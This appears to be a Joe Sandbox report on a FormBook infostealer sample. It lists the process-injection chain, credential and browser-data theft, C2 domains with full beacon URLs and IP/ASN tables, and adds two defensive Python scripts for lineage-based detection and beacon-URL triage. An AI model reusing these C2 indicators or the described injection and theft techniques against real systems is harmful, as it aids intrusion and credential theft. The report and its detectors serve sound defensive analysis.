www.jaxo.xyz: Performs DNS queries to domains with low reputation

Process tree (edges as drawn in the graph; a number after a process name is the badge the graph showed on that node):
20-EM-00- PI-INQ-3001.exe (started; badge 4)
    Binary is likely a compiled AutoIt script file
    Writes to foreign memory regions
    Maps a DLL or memory area into another process
    -> svchost.exe (started)
        Maps a DLL or memory area into another process
        -> eVmdoPPWSZoVOB.exe (injected)
            www.jaxo.xyz 66.29.149.180, ports 49754, 49755, 49756, ADVANTAGECOMUS, United States
            www.xforum.tech 103.224.182.242, ports 49758, 49759, 49760, TRELLIAN-AS-APTrellianPtyLimitedAU, Australia
            8 other IPs or domains
            Found direct / indirect Syscall (likely to bypass EDR)
            -> rasdial.exe (started; badge 13)
                Tries to steal Mail credentials (via file / registry access)
                Tries to harvest and steal browser information (history, passwords, etc)
                Modifies the context of a thread in another process (thread injection)
                2 other signatures
                -> firefox.exe (started)
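The process chain in the graph (sample -> svchost.exe, svchost.exe -> eVmdoPPWSZoVOB.exe by injection, eVmdoPPWSZoVOB.exe -> rasdial.exe -> firefox.exe) is detectable from ordinary process-creation telemetry without any FormBook-specific signature. The following is an added example, not part of the Joe Sandbox report, that replays that lineage as constructed Sysmon-style events and runs three parent/ancestor rules over them. The pid numbers reuse the graph's node numbers; the sample's parent (explorer.exe), every image path other than the sample's own Desktop path, and the representation of the injection edge as a parent link are assumptions.

```python
import ntpath
from collections import namedtuple

# Constructed process-creation events in the shape of Sysmon event ID 1
# (ProcessId, ParentProcessId, Image), replaying the lineage in the behavior
# graph. Assumptions: explorer.exe as the sample's parent, all image paths
# except the sample's, and the svchost.exe -> eVmdoPPWSZoVOB.exe injection
# edge modelled as a parent link so the ancestor walk can cross it.
Proc = namedtuple("Proc", "pid ppid image")
SAMPLE_EVENTS = [
    Proc(1, 0, r"C:\Windows\explorer.exe"),
    Proc(10, 1, r"C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe"),
    Proc(13, 10, r"C:\Windows\SysWOW64\svchost.exe"),
    Proc(16, 13, r"C:\Users\user\AppData\Local\Temp\eVmdoPPWSZoVOB.exe"),
    Proc(20, 16, r"C:\Windows\SysWOW64\rasdial.exe"),
    Proc(23, 20, r"C:\Program Files\Mozilla Firefox\firefox.exe"),
]

BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
# rasdial.exe is the tool seen in this report; the others are the same idea
# applied to neighbouring network-configuration binaries (assumption).
NETWORK_TOOLS = {"rasdial.exe", "netsh.exe", "ipconfig.exe"}
# Directory fragments a dropper typically executes from (assumption).
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\")


def basename(image):
    """Image file name without its directory; ntpath handles Windows paths on any OS."""
    return ntpath.basename(image)


def ancestors(events, pid):
    """Parent, grandparent, ... of pid as Proc records (cycle-safe)."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    pid = by_pid[pid].ppid if pid in by_pid else None
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain


def lineage(events, pid):
    """Basenames from pid up to the root, for display and triage."""
    by_pid = {e.pid: e for e in events}
    if pid not in by_pid:
        return []
    return [basename(by_pid[pid].image)] + [basename(a.image) for a in ancestors(events, pid)]


def detect(events):
    """Apply three lineage rules; returns sorted (pid, rule) findings."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = basename(e.image).lower()
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image).lower() if parent else ""
        # Rule 1: on a clean system svchost.exe is started by services.exe;
        # any other parent is a hollowed or proxied host (graph: sample -> svchost.exe).
        if name == "svchost.exe" and pname != "services.exe":
            findings.append((e.pid, "svchost_unexpected_parent"))
        # Rule 2: a network-configuration tool has no reason to open a browser
        # (graph: rasdial.exe -> firefox.exe).
        if name in BROWSERS and pname in NETWORK_TOOLS:
            findings.append((e.pid, "browser_spawned_by_network_tool"))
        # Rule 3: a Windows binary whose ancestry includes an executable
        # running from a user-writable directory.
        if e.image.lower().startswith("c:\\windows\\") and any(
            frag in a.image.lower() for a in ancestors(events, e.pid) for frag in USER_WRITABLE
        ):
            findings.append((e.pid, "system_binary_under_user_dropper"))
    return sorted(findings)


if __name__ == "__main__":
    print(" <- ".join(lineage(SAMPLE_EVENTS, 23)))
    for pid, rule in detect(SAMPLE_EVENTS):
        print(pid, rule)
```

Rule 1 and rule 3 both fire on the svchost.exe node, which is the point: the injected host looks wrong from two independent angles (its parent and its ancestry), so either rule alone would have surfaced this chain even without the FormBook Yara match.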

Source | Detection | Scanner | Label | Link
20-EM-00- PI-INQ-3001.exe | 30% | ReversingLabs | |
20-EM-00- PI-INQ-3001.exe | 28% | Virustotal | | Browse
20-EM-00- PI-INQ-3001.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
https://api.w.org/ | 0% | URL Reputation | safe |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
http://www.weep.site/v1m8/?r8=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&VZ=qzwLUJ3Xbb28 | 100% | Avira URL Cloud | malware |
http://www.onlytradez.club/zctj/?r8=tSuw7IYRRjv+wnLSX6BcwOUAvtHef9BV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEherCeW9gkiaKlQQJDWwurePQCYs04wJT4uh8=&VZ=qzwLUJ3Xbb28 | 0% | Avira URL Cloud | safe |
https://tilda.cc | 0% | Avira URL Cloud | safe |
http://mgmasistencia.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1 | 0% | Avira URL Cloud | safe |
http://mgmasistencia.com/wp-content/themes/twentytwentyone/style.css?ver=1.4 | 0% | Avira URL Cloud | safe |
http://www.anaidittrich.com/qpwk/ | 0% | Avira URL Cloud | safe |
http://www.cannulafactory.top/l90v/ | 0% | Avira URL Cloud | safe |
http://www.32wxd.top/kyiu/?VZ=qzwLUJ3Xbb28&r8=XDGtsL25HTw6JP67Ly7M1BrbeTxg63xVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszGMKw0lI8qqbvBzBP6NUCsyvYxAKvE0l8E9k= | 0% | Avira URL Cloud | safe |
https://mgmasistencia.com/acerca-de/ | 0% | Avira URL Cloud | safe |
https://mgmasistencia.com/ | 0% | Avira URL Cloud | safe |
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign= | 0% | Avira URL Cloud | safe |
http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.4 | 0% | Avira URL Cloud | safe |
http://www.xforum.tech/647x/ | 0% | Avira URL Cloud | safe |
http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.4 | 0% | Avira URL Cloud | safe |
https://es.wordpress.org/ | 0% | Avira URL Cloud | safe |
https://mgmasistencia.com/2021/08/30/hola-mundo/ | 0% | Avira URL Cloud | safe |
https://twitter.com/wordpress | 0% | Avira URL Cloud | safe |
http://www.ayypromo.shop/rgqx/ | 0% | Avira URL Cloud | safe |
https://mgmasistencia.com/blog/ | 0% | Avira URL Cloud | safe |
http://nginx.net/ | 0% | Avira URL Cloud | safe |
http://www.onlytradez.club/zctj/ | 0% | Avira URL Cloud | safe |
http://www.32wxd.top/kyiu/ | 0% | Avira URL Cloud | safe |
http://www.ayypromo.shop/rgqx/?r8=k7UoFTYShwNh8X30FXwm38h6K+JkxlagtcywMstwCAmbg7ptW+NBcIDWqO/wkzukyRO00HsnixKpsDOlj0tXoOzwTrau4xfQqB+I7fBgXd6C+YuuVtNtf8U=&VZ=qzwLUJ3Xbb28 | 0% | Avira URL Cloud | safe |
http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.4 | 0% | Avira URL Cloud | safe |
https://mgmasistencia.com/comments/feed/ | 0% | Avira URL Cloud | safe |
http://www.cannulafactory.top/l90v/?r8=65tz+8+CHtIdUwlLn50vsNwtrDevriXy7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlOmC04vqSX9mxzzPTrJ5MFsobFyJ/S8Jm0iQ=&VZ=qzwLUJ3Xbb28 | 0% | Avira URL Cloud | safe |
http://www.anaidittrich.com | 0% | Avira URL Cloud | safe |
https://mgmasistencia.com/wp-json/ | 0% | Avira URL Cloud | safe |
http://www.88nn.pro/l4rw/?r8=ZXNQqBP58JXIf3luRKwQutCZ8KZdKGRl9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj5OwULwtMZgZPw4PUiP5SYTwADLBcTbBMjV4=&VZ=qzwLUJ3Xbb28 | 0% | Avira URL Cloud | safe |
http://www.88nn.pro/l4rw/ | 0% | Avira URL Cloud | safe |
http://mgmasistencia.com/wp-content/uploads/2021/09/fondo-plumber-1000x429-1.jpg | 0% | Avira URL Cloud | safe |
http://www.jaxo.xyz/f9bc/ | 0% | Avira URL Cloud | safe |
http://www.xforum.tech/647x/?VZ=qzwLUJ3Xbb28&r8=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s= | 0% | Avira URL Cloud | safe |
https://mgmasistencia.com/contacto/ | 0% | Avira URL Cloud | safe |
http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js?ver=1.4 | 0% | Avira URL Cloud | safe |
http://www.xforum.tech/647x/?VZ=qzwLUJ3Xbb28&r8=FnaXBox54 | 0% | Avira URL Cloud | safe |
https://mgmasistencia.com/feed/ | 0% | Avira URL Cloud | safe |
http://www.redhat.com/docs/manuals/enterprise/ | 0% | Avira URL Cloud | safe |
http://www.fontanerourgente.net/t3gh/ | 0% | Avira URL Cloud | safe |
https://wordpress.org/ | 0% | Avira URL Cloud | safe |
https://mgmasistencia.com/2021/08/30/hola-mundo/#comment-1 | 0% | Avira URL Cloud | safe |
http://www.redhat.com/ | 0% | Avira URL Cloud | safe |
https://mgmasistencia.com/xmlrpc.php?rsd | 0% | Avira URL Cloud | safe |
http://www.fontanerourgente.net/t3gh/?r8=d/YHbjU0lRTRkwDxqDIxsrPGLZyEpz4ER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthesnFC5CTi9Yzd9moJgM9Hp7ieo4nvRaLbJdA=&VZ=qzwLUJ3Xbb28 | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.ayypromo.shop | 176.57.64.102 | true | false | | unknown
fontanerourgente.net | 37.187.158.211 | true | false | | unknown
www.jaxo.xyz | 66.29.149.180 | true | true | | unknown
weep.site | 194.233.65.154 | true | false | | unknown
32wxd.top | 206.119.82.116 | true | false | | unknown
www.cannulafactory.top | 18.183.3.45 | true | false | | unknown
www.anaidittrich.com | 162.55.254.209 | true | false | | unknown
www.onlytradez.club | 167.172.133.32 | true | false | | unknown
www.88nn.pro | 45.157.69.194 | true | false | | unknown
www.xforum.tech | 103.224.182.242 | true | false | | unknown
www.weep.site | unknown | unknown | true | | unknown
www.taapbit.online | unknown | unknown | true | | unknown
www.fontanerourgente.net | unknown | unknown | true | | unknown
www.32wxd.top | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.32wxd.top/kyiu/?VZ=qzwLUJ3Xbb28&r8=XDGtsL25HTw6JP67Ly7M1BrbeTxg63xVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszGMKw0lI8qqbvBzBP6NUCsyvYxAKvE0l8E9k= | false | Avira URL Cloud: safe | unknown
http://www.anaidittrich.com/qpwk/ | false | Avira URL Cloud: safe | unknown
http://www.onlytradez.club/zctj/?r8=tSuw7IYRRjv+wnLSX6BcwOUAvtHef9BV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEherCeW9gkiaKlQQJDWwurePQCYs04wJT4uh8=&VZ=qzwLUJ3Xbb28 | false | Avira URL Cloud: safe | unknown
http://www.weep.site/v1m8/?r8=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&VZ=qzwLUJ3Xbb28 | false | Avira URL Cloud: malware | unknown
http://www.cannulafactory.top/l90v/ | false | Avira URL Cloud: safe | unknown
http://www.ayypromo.shop/rgqx/ | false | Avira URL Cloud: safe | unknown
http://www.xforum.tech/647x/ | false | Avira URL Cloud: safe | unknown
http://www.onlytradez.club/zctj/ | false | Avira URL Cloud: safe | unknown
http://www.cannulafactory.top/l90v/?r8=65tz+8+CHtIdUwlLn50vsNwtrDevriXy7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlOmC04vqSX9mxzzPTrJ5MFsobFyJ/S8Jm0iQ=&VZ=qzwLUJ3Xbb28 | false | Avira URL Cloud: safe | unknown
http://www.ayypromo.shop/rgqx/?r8=k7UoFTYShwNh8X30FXwm38h6K+JkxlagtcywMstwCAmbg7ptW+NBcIDWqO/wkzukyRO00HsnixKpsDOlj0tXoOzwTrau4xfQqB+I7fBgXd6C+YuuVtNtf8U=&VZ=qzwLUJ3Xbb28 | false | Avira URL Cloud: safe | unknown
http://www.32wxd.top/kyiu/ | false | Avira URL Cloud: safe | unknown
http://www.88nn.pro/l4rw/?r8=ZXNQqBP58JXIf3luRKwQutCZ8KZdKGRl9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj5OwULwtMZgZPw4PUiP5SYTwADLBcTbBMjV4=&VZ=qzwLUJ3Xbb28 | false | Avira URL Cloud: safe | unknown
http://www.88nn.pro/l4rw/ | false | Avira URL Cloud: safe | unknown
http://www.xforum.tech/647x/?VZ=qzwLUJ3Xbb28&r8=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s= | false | Avira URL Cloud: safe | unknown
http://www.jaxo.xyz/f9bc/ | false | Avira URL Cloud: safe | unknown
http://www.fontanerourgente.net/t3gh/ | false | Avira URL Cloud: safe | unknown
http://www.fontanerourgente.net/t3gh/?r8=d/YHbjU0lRTRkwDxqDIxsrPGLZyEpz4ER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthesnFC5CTi9Yzd9moJgM9Hp7ieo4nvRaLbJdA=&VZ=qzwLUJ3Xbb28 | false | Avira URL Cloud: safe | unknown
Memory dump sources referenced by label in the table below (all others are written out in full):
[A] eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp
[B] rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmp
[C] rasdial.exe, 00000006.00000002.3533362762.0000000007D6E000.00000004.00000020.00020000.00000000.sdmp

Name | Source | Malicious | Antivirus Detection | Reputation
http://mgmasistencia.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1 | [A], [B] | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/chrome_newtab | [C] | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | [C] | false | URL Reputation: safe | unknown
https://mgmasistencia.com/acerca-de/ | [A], [B] | false | Avira URL Cloud: safe | unknown
http://mgmasistencia.com/wp-content/themes/twentytwentyone/style.css?ver=1.4 | [A], [B] | false | Avira URL Cloud: safe | unknown
https://mgmasistencia.com/ | [B] | false | Avira URL Cloud: safe | unknown
https://tilda.cc | eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000004546000.00000004.80000000.00040000.00000000.sdmp; rasdial.exe, 00000006.00000002.3531860991.0000000006236000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | [C] | false | URL Reputation: safe | unknown
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign= | eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003724000.00000004.80000000.00040000.00000000.sdmp; rasdial.exe, 00000006.00000002.3531860991.0000000005414000.00000004.10000000.00040000.00000000.sdmp; firefox.exe, 00000007.00000002.2283662036.0000000038524000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.4 | [A], [B] | false | Avira URL Cloud: safe | unknown
https://twitter.com/wordpress | [A], [B] | false | Avira URL Cloud: safe | unknown
https://mgmasistencia.com/blog/ | [A], [B] | false | Avira URL Cloud: safe | unknown
https://es.wordpress.org/ | [A], [B] | false | Avira URL Cloud: safe | unknown
https://mgmasistencia.com/2021/08/30/hola-mundo/ | [A], [B] | false | Avira URL Cloud: safe | unknown
http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.4 | [A], [B] | false | Avira URL Cloud: safe | unknown
http://nginx.net/ | eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000004222000.00000004.80000000.00040000.00000000.sdmp; rasdial.exe, 00000006.00000002.3531860991.0000000005F12000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | [C] | false | URL Reputation: safe | unknown
http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.4 | [A], [B] | false | Avira URL Cloud: safe | unknown
https://mgmasistencia.com/comments/feed/ | [A], [B] | false | Avira URL Cloud: safe | unknown
http://www.anaidittrich.com | eVmdoPPWSZoVOB.exe, 00000005.00000002.3531540694.0000000002AF8000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://mgmasistencia.com/wp-json/ | [B] | false | Avira URL Cloud: safe | unknown
http://mgmasistencia.com/wp-content/uploads/2021/09/fondo-plumber-1000x429-1.jpg | [A], [B] | false | Avira URL Cloud: safe | unknown
https://mgmasistencia.com/contacto/ | [A], [B] | false | Avira URL Cloud: safe | unknown
https://api.w.org/ | [B] | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | [C] | false | URL Reputation: safe | unknown
https://mgmasistencia.com/feed/ | [A], [B] | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | [C] | false | URL Reputation: safe | unknown
http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js?ver=1.4 | [A], [B] | false | Avira URL Cloud: safe | unknown
http://www.redhat.com/docs/manuals/enterprise/ | eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000004222000.00000004.80000000.00040000.00000000.sdmp; rasdial.exe, 00000006.00000002.3531860991.0000000005F12000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | [C] | false | URL Reputation: safe | unknown
http://www.xforum.tech/647x/?VZ=qzwLUJ3Xbb28&r8=FnaXBox54 | rasdial.exe, 00000006.00000002.3531860991.0000000005D80000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://wordpress.org/ | [A], [B] | false | Avira URL Cloud: safe | unknown
https://mgmasistencia.com/2021/08/30/hola-mundo/#comment-1 | [A], [B] | false | Avira URL Cloud: safe | unknown
https://mgmasistencia.com/xmlrpc.php?rsd | [A], [B] | false | Avira URL Cloud: safe | unknown
http://www.redhat.com/ | rasdial.exe, 00000006.00000002.3531860991.0000000005F12000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | [C] | false | URL Reputation: safe | unknown
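Every contacted URL in the tables above has the same shape: plain http, a single four-character path segment, and a query with two short keys (r8 and VZ) carrying one long base64 blob and one short identifier that is identical across hosts (qzwLUJ3Xbb28), while the mgmasistencia.com, duckduckgo and ecosia strings are ordinary web-page residue. The following is an added example, not part of the Joe Sandbox report, that turns that observation into triage code: it classifies URLs by that shape, groups the check-in hosts by the shared identifier, and emits a deduplicated host list. The shape itself is a heuristic read off this report's URLs, not a published FormBook signature, and the sample input is a constructed subset of the report's own URLs.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample input: a subset of the URLs this report lists as contacted
# or found in memory, including the truncated xforum.tech string as it
# appeared in a memory dump. No other URLs are invented.
SAMPLE_URLS = [
    "http://www.weep.site/v1m8/?r8=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&VZ=qzwLUJ3Xbb28",
    "http://www.onlytradez.club/zctj/?r8=tSuw7IYRRjv+wnLSX6BcwOUAvtHef9BV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEherCeW9gkiaKlQQJDWwurePQCYs04wJT4uh8=&VZ=qzwLUJ3Xbb28",
    "http://www.32wxd.top/kyiu/?VZ=qzwLUJ3Xbb28&r8=XDGtsL25HTw6JP67Ly7M1BrbeTxg63xVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszGMKw0lI8qqbvBzBP6NUCsyvYxAKvE0l8E9k=",
    "http://www.jaxo.xyz/f9bc/",
    "http://www.xforum.tech/647x/",
    "http://www.xforum.tech/647x/?VZ=qzwLUJ3Xbb28&r8=FnaXBox54",
    "http://mgmasistencia.com/wp-content/themes/twentytwentyone/style.css?ver=1.4",
    "https://duckduckgo.com/ac/?q=",
    "https://ac.ecosia.org/autocomplete?q=",
]

# Assumption (a heuristic derived from the URLs above, not a published FormBook
# signature): check-ins are plain http, the path is one four-character
# alphanumeric segment, and the query has exactly two two-character keys, one
# with a long base64 blob and one with a short alphanumeric identifier, in
# either order.
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")
KEY_RE = re.compile(r"^[A-Za-z0-9]{2}$")
BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{80,}={0,2}$")
IDENT_RE = re.compile(r"^[A-Za-z0-9]{8,16}$")


def split_query(query):
    """Split on '&' and the first '=' without decoding.

    urllib's parse_qsl would turn '+' into a space and corrupt the base64
    blobs, so the raw form is kept.
    """
    pairs = []
    for item in query.split("&") if query else []:
        key, _, value = item.partition("=")
        pairs.append((key, value))
    return pairs


def classify(url):
    """Return (label, features) for one URL.

    label is "beacon" for a fully formed check-in, "candidate" for a
    beacon-shaped path whose query is absent or malformed (stage markers and
    truncated memory strings), or None for anything else.
    """
    parts = urlsplit(url)
    if parts.scheme != "http" or not PATH_RE.match(parts.path):
        return None, None
    feats = {"host": parts.hostname, "path": parts.path, "blob_key": None, "ident": None}
    pairs = split_query(parts.query)
    if len(pairs) == 2 and all(KEY_RE.match(k) for k, _ in pairs):
        for key, value in pairs:
            if BLOB_RE.match(value):
                feats["blob_key"] = key
            elif IDENT_RE.match(value):
                feats["ident"] = f"{key}={value}"
    if feats["blob_key"] and feats["ident"]:
        return "beacon", feats
    return "candidate", feats


def cluster_by_ident(urls):
    """Group beacon hosts by their short identifier parameter.

    Hosts that share one identifier were contacted by the same configuration,
    which is what makes them one indicator set rather than unrelated sites.
    """
    groups = defaultdict(set)
    for url in urls:
        label, feats = classify(url)
        if label == "beacon":
            groups[feats["ident"]].add(feats["host"])
    return {ident: sorted(hosts) for ident, hosts in groups.items()}


def indicators(urls):
    """Deduplicated, sorted list of every beacon or candidate host."""
    hosts = {feats["host"] for url in urls for label, feats in [classify(url)] if label}
    return sorted(hosts)


if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(classify(url)[0], url[:60])
    print(cluster_by_ident(SAMPLE_URLS))
    print(indicators(SAMPLE_URLS))
```

The "candidate" label is deliberate: the bare /f9bc/ and /647x/ paths and the truncated string are not complete check-ins, but they sit on hosts that only appear in this pattern, so they belong on the block list even though the reputation columns above rate them safe.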
IP | Domain | Country | ASN | ASN Name | Malicious
176.57.64.102 | www.ayypromo.shop | Bosnia and Herzegowina | 47959 | TELINEABA | false
162.55.254.209 | www.anaidittrich.com | United States | 35893 | ACPCA | false
167.172.133.32 | www.onlytradez.club | United States | 14061 | DIGITALOCEAN-ASNUS | false
18.183.3.45 | www.cannulafactory.top | United States | 16509 | AMAZON-02US | false
194.233.65.154 | weep.site | Germany | 6659 | NEXINTO-DE | false
103.224.182.242 | www.xforum.tech | Australia | 133618 | TRELLIAN-AS-APTrellianPtyLimitedAU | false
45.157.69.194 | www.88nn.pro | Germany | 136933 | GIGABITBANK-AS-APGigabitbankGlobalHK | false
66.29.149.180 | www.jaxo.xyz | United States | 19538 | ADVANTAGECOMUS | true
37.187.158.211 | fontanerourgente.net | France | 16276 | OVHFR | false
206.119.82.116 | 32wxd.top | United States | 174 | COGENT-174US | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1503379
Start date and time: 2024-09-03 13:51:55 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 52s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 20-EM-00- PI-INQ-3001.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/5@11/10
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 60
• Number of non-executed functions: 259
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information.
• Report size exceeded the maximum capacity and may be missing disassembly code.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
07:53:54 | API Interceptor | 6730952x Sleep call for process: rasdial.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
176.57.64.102 | RFQ STR-160-01.exe | malicious | FormBook | www.ayypromo.shop/rgqx/
176.57.64.102 | 報價請求 - 樣本目錄.vbs | malicious | FormBook, GuLoader | www.ayypromo.shop/mktg/
176.57.64.102 | 031215-Revised-01.exe | malicious | FormBook | www.ayypromo.shop/rgqx/
176.57.64.102 | Copy of 01. Bill of Material - 705.exe | malicious | FormBook | www.ayypromo.shop/rgqx/
176.57.64.102 | Prośba o Wycena - Strony 4-6.vbs | malicious | FormBook, GuLoader | www.ayypromo.shop/mktg/
176.57.64.102 | TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe | malicious | FormBook | www.ayypromo.shop/6ocx/
162.55.254.209 | RFQ STR-160-01.exe | malicious | FormBook | www.anaidittrich.com/qpwk/
162.55.254.209 | Copy of 01. Bill of Material - 705.exe | malicious | FormBook | www.anaidittrich.com/qpwk/
167.172.133.32 | RFQ STR-160-01.exe | malicious | FormBook | www.onlytradez.club/zctj/
167.172.133.32 | 031215-Revised-01.exe | malicious | FormBook | www.onlytradez.club/zctj/
167.172.133.32 | Copy of 01. Bill of Material - 705.exe | malicious | FormBook | www.onlytradez.club/zctj/
167.172.133.32 | RCZ-PI-4057.exe | malicious | FormBook | www.onlytradez.club/zctj/
167.172.133.32 | APS-0240226.exe | malicious | FormBook | www.onlytradez.club/zctj/
167.172.133.32 | Contract.exe | malicious | FormBook | www.onlytradez.club/h6ky/
167.172.133.32 | draft Proforma Invoice.exe | malicious | FormBook | www.onlytradez.club/h6ky/
18.183.3.45 | RFQ STR-160-01.exe | malicious | FormBook | www.cannulafactory.top/l90v/
18.183.3.45 | 報價請求 - 樣本目錄.vbs | malicious | FormBook, GuLoader | www.cannulafactory.top/y82c/
18.183.3.45 | 031215-Revised-01.exe | malicious | FormBook | www.cannulafactory.top/l90v/
